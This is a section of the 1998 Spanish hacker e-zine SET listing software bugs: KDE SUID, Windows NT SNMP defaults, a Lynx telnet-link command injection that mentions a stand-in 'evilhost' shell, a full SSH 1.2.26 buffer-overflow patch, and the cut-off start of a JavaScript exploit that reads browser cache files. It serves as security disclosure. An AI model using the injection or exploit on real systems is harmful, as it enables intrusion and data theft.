-[ 0x09 ]--------------------------------------------------------------------
-[ LOS BUGS DEL MES ]--------------------------------------------------------
-[ by SET Staff ]-----------------------------------------------------SET-17-
-( 0x01 )-
Para : KDE
Tema : Privilegios de root
Patch : Unos prefieren WindowMaker, otros Gnome, AfterStep...
Creditos : Varios
Descripcion y Notas:
Aun no me lo explico. Y es que es dificil de entender como do programas como
el klock 1.0 y el kscreensaver pueden comprometer la cuenta de administrador.
Al parecer se trata de ciertos SUID por ahi perdidos, pero bueno, se supone
que se corregira antes de sacar la proxima version de KDE.
-( 0x02 )-
Para : Windows NT
Tema : SNMP
Patch : Service Pack 4 !?!?!?!?
Creditos : Security Research Labs
Descripcion y Notas:
Cuando se instala el servicio SNMP, la configuracion por defecto deja al
sistema desnudo ante un posible ataque. Esta configuracion, entre otras
cosas, de permisos de lectura/escritura a la comunidad. Y da la casualidad
que las versiones previas al Service Pack 4 no permiten seleccionar que este
grupo de acceso solo tenga derechos de lectura.
De esta forma, un atacante bien informado podra modificar las tablas IP y
ARP, y eliminar o activar interfaces de red a su antojo. Y el potencial
riesgo que esto supone aumenta cuando la maquina se trata de un firewall.
Sera este uno de los mas de 650 bugs que dicen corrige el Service Pack 4?
-( 0x03 )-
Para : Lynx
Tema : Troyanos
Patch : Aqui abajo
Creditos : Artur Grabowski
Descripcion y Notas:
Existen sistemas en los que el unico programa que tiene permitida la
ejecucion es el Lynx. O en los que incluso este esta configurado como si
de la shell de login se tratase.
Pues bien, podemos ejecutar codigo arbitrariamente desde el lynx. Por
ejemplo, si seleccionamos el siguiente link de una pagina, obtendremos una
shell limpia:
foo
Asimismo podemos ejecutar cualquier codigo. Siguiendo con el ejemplo
anterior, si pulsamos sobre este enlace:
foo
el shell de eviluser@evilhost.foo ejecutara algunos comandos sobre la victima.
El problema se encuentra en WWW/Library/Implementation/HTTelnet.c, dentro de
la funcion remote_session. Ahi podremos observar como se eleminan caracteres
extra~os para evitar problemas, menos el nombre de usuario.
Para solucionarlo, podemos aplicar el siguiente patch:
<++> set_017/patches/HTTelnet.c
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c 1998/03/11 17:47:47 1.1.1.1
+++ HTTelnet.c 1998/11/16 17:01:35
@@ -73,8 +73,7 @@
* *cp=0; / * terminate at any ;,<,>,`,|,",' or space or return
* or tab to prevent security whole
*/
- for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
- cp++) {
+ for(cp = host; *cp != '\0'; cp++) {
if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
*cp != ':' && *cp != '.' && *cp != '@') {
*cp = '\0';
<-->
-( 0x04 )-
Para : SSH 1.2.26
Tema : Buffer Overflow
Patch : Aqui, donde si no?
Creditos : Varios
Descripcion y Notas:
Haces un mes aproximadamente se volvio a detectar un fallo en la version
1.2.26 del SSH, que producia errores de desbordamiento. En esta ocasion os
ofrecemos el patch correspondiente para que podais solucionar el problema
en vuestro sistema. Se trata del patch propuesto por IBM, que al parecer
funciona en todas las plataformas.
<++> set_017/patches/ssh-1.2.26
diff -u -r ssh-1.2.26-orig/Makefile.in ssh-1.2.26/Makefile.in
--- ssh-1.2.26-orig/Makefile.in Wed Jul 8 12:40:39 1998
+++ ssh-1.2.26/Makefile.in Sun Nov 1 16:11:44 1998
@@ -315,7 +315,7 @@
rsa.o randoms.o md5.o buffer.o emulate.o packet.o compress.o \
xmalloc.o ttymodes.o newchannels.o bufaux.o authfd.o authfile.o \
crc32.o rsaglue.o cipher.o des.o match.o arcfour.o mpaux.o \
- userfile.o signals.o blowfish.o deattack.o
+ userfile.o signals.o blowfish.o deattack.o snprintf.o
SSHD_OBJS = sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o pty.o \
log-server.o login.o hostfile.o canohost.o servconf.o tildexpand.o \
serverloop.o $(COMMON_OBJS) $(KERBEROS_OBJS) $(SSHDCONFOBJS)
@@ -332,7 +332,7 @@
xmalloc.o bufaux.o authfd.o authfile.o cipher.o blowfish.o \
des.o arcfour.o mpaux.o userfile.o signals.o $(LIBOBJS) \
$(CONFOBJS)
-SCP_OBJS = scp.o xmalloc.o
+SCP_OBJS = scp.o xmalloc.o snprintf.o
#ifdef F_SECURE_COMMERCIAL
#
#
@@ -359,7 +359,7 @@
randoms.h ttymodes.h authfd.h crc32.h includes.h \
readconf.h userfile.h blowfish.h des.h md5.h rsa.h version.h bufaux.h \
mpaux.h servconf.h xmalloc.h buffer.h emulate.h packet.h ssh.h \
- deattack.h
+ deattack.h snprintf.h
DISTFILES = $(srcdir)/COPYING $(srcdir)/README $(srcdir)/README.SECURID \
$(srcdir)/README.TIS $(srcdir)/README.SECURERPC \
diff -u -r ssh-1.2.26-orig/log-server.c ssh-1.2.26/log-server.c
--- ssh-1.2.26-orig/log-server.c Wed Jul 8 12:40:36 1998
+++ ssh-1.2.26/log-server.c Sun Nov 1 16:14:23 1998
@@ -60,6 +60,7 @@
#include "packet.h"
#include "xmalloc.h"
#include "ssh.h"
+#include "snprintf.h"
static int log_debug = 0;
static int log_quiet = 0;
@@ -134,7 +135,7 @@
if (log_quiet)
return;
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "log: %s\n", buf);
@@ -175,7 +176,7 @@
if (log_quiet)
return;
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "log: %s\n", buf);
@@ -191,7 +192,7 @@
if (!log_debug || log_quiet)
return;
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "debug: %s\n", buf);
@@ -207,7 +208,7 @@
if (log_quiet)
return;
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "error: %s\n", buf);
@@ -302,7 +303,7 @@
if (log_quiet)
exit(1);
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "fatal: %s\n", buf);
@@ -321,7 +322,7 @@
if (log_quiet)
exit(1);
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
if (log_on_stderr)
fprintf(stderr, "fatal: %s\n", buf);
diff -u -r ssh-1.2.26-orig/packet.c ssh-1.2.26/packet.c
--- ssh-1.2.26-orig/packet.c Wed Jul 8 12:40:37 1998
+++ ssh-1.2.26/packet.c Sun Nov 1 16:15:26 1998
@@ -90,6 +90,7 @@
#include "getput.h"
#include "compress.h"
#include "deattack.h"
+#include "snprintf.h"
/* This variable contains the file descriptors used for communicating with
the other side. connection_in is used for reading; connection_out
@@ -693,7 +694,7 @@
va_list args;
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
packet_start(SSH_MSG_DEBUG);
@@ -719,7 +720,7 @@
/* Format the message. Note that the caller must make sure the message
is of limited size. */
va_start(args, fmt);
- vsprintf(buf, fmt, args);
+ vsnprintf(buf, sizeof(buf), fmt, args);
va_end(args);
/* Send the disconnect message to the other side, and wait for it to get
diff -u -r ssh-1.2.26-orig/scp.c ssh-1.2.26/scp.c
--- ssh-1.2.26-orig/scp.c Wed Jul 8 12:40:38 1998
+++ ssh-1.2.26/scp.c Sun Nov 1 16:34:57 1998
@@ -134,6 +134,7 @@
#include "includes.h"
#include "ssh.h"
#include "xmalloc.h"
+#include "snprintf.h"
#ifdef HAVE_UTIME_H
#include
#if defined(_NEXT_SOURCE) && !defined(_POSIX_SOURCE)
@@ -332,7 +333,7 @@
char buf[1024];
va_start(ap, fmt);
- vsprintf(buf, fmt, ap);
+ vsnprintf(buf, sizeof(buf), fmt, ap);
va_end(ap);
fprintf(stderr, "%s\n", buf);
exit(255);
diff -u -r ssh-1.2.26-orig/snprintf.c ssh-1.2.26/snprintf.c
--- ssh-1.2.26-orig/snprintf.c Sun Nov 1 16:19:33 1998
+++ ssh-1.2.26/snprintf.c Sun Nov 1 16:24:37 1998
@@ -0,0 +1,559 @@
+/*
+
+ Author: Tomi Salo
+
+ Copyright (C) 1996 SSH Communications Security Oy, Espoo, Finland
+ All rights reserved.
+
+ Implementation of functions snprintf() and vsnprintf()
+
+ */
+
+/*
+ * $Id: snprintf.c,v 1.19 1998/06/03 00:45:30 ylo Exp $
+ * $Log: snprintf.c,v $
+ * $EndLog$
+ */
+
+#include "includes.h"
+#include "snprintf.h"
+
+#define MINUS_FLAG 0x1
+#define PLUS_FLAG 0x2
+#define SPACE_FLAG 0x4
+#define HASH_FLAG 0x8
+#define CONV_TO_SHORT 0x10
+#define IS_LONG_INT 0x20
+#define IS_LONG_DOUBLE 0x40
+#define X_UPCASE 0x80
+#define IS_NEGATIVE 0x100
+#define UNSIGNED_DEC 0x200
+#define ZERO_PADDING 0x400
+
+#undef sprintf
+
+/* Extract a formatting directive from str. Str must point to a '%'.
+ Returns number of characters used or zero if extraction failed. */
+
+int
+snprintf_get_directive(const char *str, int *flags, int *width,
+ int *precision, char *format_char, va_list *ap)
+{
+ int length, n;
+ const char *orig_str = str;
+
+ *flags = 0;
+ *width = 0;
+ *precision = 0;
+ *format_char = (char)0;
+
+ if (*str == '%')
+ {
+ /* Get the flags */
+ str++;
+ while (*str == '-' || *str == '+' || *str == ' '
+ || *str == '#' || *str == '0')
+ {
+ switch (*str)
+ {
+ case '-':
+ *flags |= MINUS_FLAG;
+ break;
+ case '+':
+ *flags |= PLUS_FLAG;
+ break;
+ case ' ':
+ *flags |= SPACE_FLAG;
+ break;
+ case '#':
+ *flags |= HASH_FLAG;
+ break;
+ case '0':
+ *flags |= ZERO_PADDING;
+ break;
+ }
+ str++;
+ }
+
+ /* Don't pad left-justified numbers withs zeros */
+ if ((*flags & MINUS_FLAG) && (*flags & ZERO_PADDING))
+ *flags &= ~ZERO_PADDING;
+
+ /* Is width field present? */
+ if (isdigit(*str))
+ {
+ n = sscanf(str, "%d", width);
+ if (n == 0)
+ return 0;
+
+ /* Step through the field */
+ while (isdigit(*str))
+ str++;
+ }
+ else
+ if (*str == '*')
+ {
+ *width = va_arg(*ap, int);
+ str++;
+ }
+
+ /* Is the precision field present? */
+ if (*str == '.')
+ {
+ str++;
+ if (isdigit(*str))
+ {
+ n = sscanf(str, "%d", precision);
+ if (n == 0)
+ return 0;
+
+ /* Step through the field */
+ while (isdigit(*str))
+ str++;
+ }
+ else
+ if (*str == '*')
+ {
+ *precision = va_arg(*ap, int);
+ str++;
+ }
+ else
+ *precision = 0;
+ }
+
+ /* Get the optional type character */
+ if (*str == 'h')
+ {
+ *flags |= CONV_TO_SHORT;
+ str++;
+ }
+ else
+ {
+ if (*str == 'l')
+ {
+ *flags |= IS_LONG_INT;
+ str++;
+ }
+ else
+ {
+ if (*str == 'L')
+ {
+ *flags |= IS_LONG_DOUBLE;
+ str++;
+ }
+ }
+ }
+
+ /* Get and check the formatting character */
+
+ *format_char = *str;
+ str++;
+ length = str - orig_str;
+
+ switch (*format_char)
+ {
+ case 'i': case 'd': case 'o': case 'u': case 'x': case 'X':
+ case 'f': case 'e': case 'E': case 'g': case 'G':
+ case 'c': case 's': case 'p': case 'n':
+ if (*format_char == 'X')
+ *flags |= X_UPCASE;
+ if (*format_char == 'o')
+ *flags |= UNSIGNED_DEC;
+ return length;
+
+ default:
+ return 0;
+ }
+ }
+ else
+ {
+ return 0;
+ }
+}
+
+/* Convert a integer from unsigned long int representation
+ to string representation. This will insert prefixes if needed
+ (leading zero for octal and 0x or 0X for hexadecimal) and
+ will write at most buf_size characters to buffer.
+ tmp_buf is used because we want to get correctly truncated
+ results.
+ */
+
+int
+snprintf_convert_ulong(char *buffer, size_t buf_size, int base, char *digits,
+ unsigned long int ulong_val, int flags, int width,
+ int precision)
+{
+ int tmp_buf_len = 100 + width, len;
+ char *tmp_buf, *tmp_buf_ptr, prefix[2];
+ tmp_buf = xmalloc(tmp_buf_len);
+
+ prefix[0] = '\0';
+ prefix[1] = '\0';
+
+ /* Make tmp_buf_ptr point just past the last char of buffer */
+ tmp_buf_ptr = tmp_buf + tmp_buf_len;
+
+ /* Main conversion loop */
+ do
+ {
+ *--tmp_buf_ptr = digits[ulong_val % base];
+ ulong_val /= base;
+ precision--;
+ }
+ while ((ulong_val != 0 || precision > 0) && tmp_buf_ptr > tmp_buf);
+
+ /* Get the prefix */
+ if (!(flags & IS_NEGATIVE))
+ {
+ if (base == 16 && (flags & HASH_FLAG))
+ if (flags && X_UPCASE)
+ {
+ prefix[0] = 'x';
+ prefix[1] = '0';
+ }
+ else
+ {
+ prefix[0] = 'X';
+ prefix[1] = '0';
+ }
+
+ if (base == 8 && (flags & HASH_FLAG))
+ prefix[0] = '0';
+
+ if (base == 10 && !(flags & UNSIGNED_DEC) && (flags & PLUS_FLAG))
+ prefix[0] = '+';
+ else
+ if (base == 10 && !(flags & UNSIGNED_DEC) && (flags & SPACE_FLAG))
+ prefix[0] = ' ';
+ }
+ else
+ prefix[0] = '-';
+
+ if (prefix[0] != '\0' && tmp_buf_ptr > tmp_buf)
+ {
+ *--tmp_buf_ptr = prefix[0];
+ if (prefix[1] != '\0' && tmp_buf_ptr > tmp_buf)
+ *--tmp_buf_ptr = prefix[1];
+ }
+
+ len = (tmp_buf + tmp_buf_len) - tmp_buf_ptr;
+
+ if (len <= buf_size)
+ {
+ if (len < width)
+ {
+ if (width > (tmp_buf_ptr - tmp_buf))
+ width = (tmp_buf_ptr - tmp_buf);
+ if (flags & MINUS_FLAG)
+ {
+ memcpy(buffer, tmp_buf_ptr, len);
+ memset(buffer + len, (flags & ZERO_PADDING)?'0':' ',
+ width - len);
+ len = width;
+ }
+ else
+ {
+ memset(buffer, (flags & ZERO_PADDING)?'0':' ',
+ width - len);
+ memcpy(buffer + width - len, tmp_buf_ptr, len);
+ len = width;
+ }
+ }
+ else
+ {
+ memcpy(buffer, tmp_buf_ptr, len);
+ }
+ xfree(tmp_buf);
+ return len;
+ }
+ else
+ {
+ memcpy(buffer, tmp_buf_ptr, buf_size);
+ xfree(tmp_buf);
+ return buf_size;
+ }
+}
+
+int
+snprintf_convert_float(char *buffer, size_t buf_size,
+ double dbl_val, int flags, int width,
+ int precision, char format_char)
+{
+ char print_buf[160], print_buf_len = 0;
+ char format_str[80], *format_str_ptr;
+
+ format_str_ptr = format_str;
+
+ if (width > 155) width = 155;
+ if (precision <= 0)
+ precision = 6;
+ if (precision > 120)
+ precision = 120;
+
+ /* Construct the formatting string and let system's sprintf
+ do the real work. */
+
+ *format_str_ptr++ = '%';
+
+ if (flags & MINUS_FLAG)
+ *format_str_ptr++ = '-';
+ if (flags & PLUS_FLAG)
+ *format_str_ptr++ = '+';
+ if (flags & SPACE_FLAG)
+ *format_str_ptr++ = ' ';
+ if (flags & ZERO_PADDING)
+ *format_str_ptr++ = '0';
+ if (flags & HASH_FLAG)
+ *format_str_ptr++ = '#';
+
+ format_str_ptr += sprintf(format_str_ptr, "%d.%d", width, precision);
+ if (flags & IS_LONG_DOUBLE)
+ *format_str_ptr++ = 'L';
+ *format_str_ptr++ = format_char;
+ *format_str_ptr++ = '\0';
+
+ print_buf_len = sprintf(print_buf, format_str, dbl_val);
+
+ if (print_buf_len > buf_size) print_buf_len = buf_size;
+ strncpy(buffer, print_buf, print_buf_len);
+ return print_buf_len;
+}
+
+int
+snprintf(char *str, size_t size, const char *format, ...)
+{
+ int ret;
+ va_list ap;
+ va_start(ap, format);
+ ret = vsnprintf(str, size, format, ap);
+ va_end(ap);
+
+ return ret;
+}
+
+int
+vsnprintf(char *str, size_t size, const char *format, va_list ap)
+{
+ int status, left = (int)size - 1;
+ const char *format_ptr = format;
+ int flags, width, precision, i;
+ char format_char, *orig_str = str;
+ int *int_ptr;
+ long int long_val;
+ unsigned long int ulong_val;
+ char *str_val;
+ double dbl_val;
+
+ flags = 0;
+ while (format_ptr < format + strlen(format))
+ {
+ if (*format_ptr == '%')
+ {
+ if (format_ptr[1] == '%' && left > 0)
+ {
+ *str++ = '%';
+ left--;
+ format_ptr += 2;
+ }
+ else
+ {
+ if (left <= 0)
+ {
+ *str = '\0';
+ return size;
+ }
+ else
+ {
+ status = snprintf_get_directive(format_ptr, &flags, &width,
+ &precision, &format_char,
+ &ap);
+ if (status == 0)
+ {
+ *str = '\0';
+ return 0;
+ }
+ else
+ {
+ format_ptr += status;
+ /* Print a formatted argument */
+ switch (format_char)
+ {
+ case 'i': case 'd':
+ /* Convert to unsigned long int before
+ actual conversion to string */
+ if (flags & IS_LONG_INT)
+ long_val = va_arg(ap, long int);
+ else
+ long_val = (long int) va_arg(ap, int);
+
+ if (long_val < 0)
+ {
+ ulong_val = (unsigned long int) -long_val;
+ flags |= IS_NEGATIVE;
+ }
+ else
+ {
+ ulong_val = (unsigned long int) long_val;
+ }
+ status = snprintf_convert_ulong(str, left, 10,
+ "0123456789",
+ ulong_val, flags,
+ width, precision);
+ str += status;
+ left -= status;
+ break;
+
+ case 'x':
+ if (flags & IS_LONG_INT)
+ ulong_val = va_arg(ap, unsigned long int);
+ else
+ ulong_val =
+ (unsigned long int) va_arg(ap, unsigned int);
+
+ status = snprintf_convert_ulong(str, left, 16,
+ "0123456789abcdef",
+ ulong_val, flags,
+ width, precision);
+ str += status;
+ left -= status;
+ break;
+
+ case 'X':
+ if (flags & IS_LONG_INT)
+ ulong_val = va_arg(ap, unsigned long int);
+ else
+ ulong_val =
+ (unsigned long int) va_arg(ap, unsigned int);
+
+ status = snprintf_convert_ulong(str, left, 16,
+ "0123456789ABCDEF",
+ ulong_val, flags,
+ width, precision);
+ str += status;
+ left -= status;
+ break;
+
+ case 'o':
+ if (flags & IS_LONG_INT)
+ ulong_val = va_arg(ap, unsigned long int);
+ else
+ ulong_val =
+ (unsigned long int) va_arg(ap, unsigned int);
+
+ status = snprintf_convert_ulong(str, left, 8,
+ "01234567",
+ ulong_val, flags,
+ width, precision);
+ str += status;
+ left -= status;
+ break;
+
+ case 'u':
+ if (flags & IS_LONG_INT)
+ ulong_val = va_arg(ap, unsigned long int);
+ else
+ ulong_val =
+ (unsigned long int) va_arg(ap, unsigned int);
+
+ status = snprintf_convert_ulong(str, left, 10,
+ "0123456789",
+ ulong_val, flags,
+ width, precision);
+ str += status;
+ left -= status;
+ break;
+
+ case 'p':
+ break;
+
+ case 'c':
+ if (flags & IS_LONG_INT)
+ ulong_val = va_arg(ap, unsigned long int);
+ else
+ ulong_val =
+ (unsigned long int) va_arg(ap, unsigned int);
+ *str++ = (unsigned char)ulong_val;
+ left--;
+ break;
+
+ case 's':
+ str_val = va_arg(ap, char *);
+
+ if (str_val == NULL)
+ str_val = "(null)";
+
+ if (precision == 0)
+ precision = strlen(str_val);
+ else
+ {
+ if (memchr(str_val, 0, precision) != NULL)
+ precision = strlen(str_val);
+ }
+ if (precision > left)
+ precision = left;
+
+ if (width > left)
+ width = left;
+ if (width < precision)
+ width = precision;
+ i = width - precision;
+
+ if (flags & MINUS_FLAG)
+ {
+ strncpy(str, str_val, precision);
+ memset(str + precision,
+ (flags & ZERO_PADDING)?'0':' ', i);
+ }
+ else
+ {
+ memset(str, (flags & ZERO_PADDING)?'0':' ', i);
+ strncpy(str + i, str_val, precision);
+ }
+ str += width;
+ left -= width;
+ break;
+
+ case 'n':
+ int_ptr = va_arg(ap, int *);
+ *int_ptr = str - orig_str;
+ break;
+
+ case 'f': case 'e': case 'E': case 'g': case 'G':
+ if (flags & IS_LONG_DOUBLE)
+ dbl_val = (double) va_arg(ap, long double);
+ else
+ dbl_val = va_arg(ap, double);
+ status =
+ snprintf_convert_float(str, left, dbl_val, flags,
+ width, precision,
+ format_char);
+ str += status;
+ left -= status;
+ break;
+
+ default:
+ break;
+ }
+ }
+ }
+ }
+ }
+ else
+ {
+ if (left > 0)
+ {
+ *str++ = *format_ptr++;
+ left--;
+ }
+ else
+ {
+ *str = '\0';
+ return size;
+ }
+ }
+ }
+ *str = '\0';
+ return size - left - 1;
+}
+
diff -u -r ssh-1.2.26-orig/snprintf.h ssh-1.2.26/snprintf.h
--- ssh-1.2.26-orig/snprintf.h Sun Nov 1 16:19:25 1998
+++ ssh-1.2.26/snprintf.h Sun Nov 1 16:16:48 1998
@@ -0,0 +1,46 @@
+/*
+
+ Author: Tomi Salo
+
+ Copyright (C) 1996 SSH Communications Security Oy, Espoo, Finland
+ All rights reserved.
+
+ Header file for snprintf.c
+
+ */
+
+/*
+ * $Id:
+ * $Log: snprintf.h,v $
+ * $EndLog$
+ */
+
+#ifndef SNPRINTF_H
+#define SNPRINTF_H
+
+#include "includes.h"
+
+/* Write formatted text to buffer 'str', using format string 'format'.
+ Returns number of characters written, or negative if error
+ occurred. SshBuffer's size is given in 'size'. Format string is
+ understood as defined in ANSI C.
+
+ NOTE: This does NOT work identically with BDS's snprintf.
+
+ Integers: Ansi C says that precision specifies the minimun
+ number of digits to print. BSD's version however counts the
+ prefixes (+, -, ' ', '0x', '0X', octal prefix '0'...) as
+ 'digits'.
+
+ Also, BSD implementation does not permit padding integers
+ to specified width with zeros on left (in front of the prefixes),
+ it uses spaces instead, even when Ansi C only forbids padding
+ with zeros on the right side of numbers.
+
+ */
+
+int snprintf(char *str, size_t size, const char *format, ...);
+
+int vsnprintf(char *str, size_t size, const char *format, va_list ap);
+
+#endif /* SNPRINTF_H */
<-->
-( 0x05 )-
Para : JavaScript 1.x
Tema : Acceso a ficheros
Patch : Uhmmm!
Creditos : Georgi Guninski
<++> set_017/exploits/lector.js
sl=window.open('wysiwyg://1/about:cache');
//For Netscape 3.04 remove 'wysiwyg://1/'
sl2=sl.window.open();
sl2.location="javascript:function f() {
s='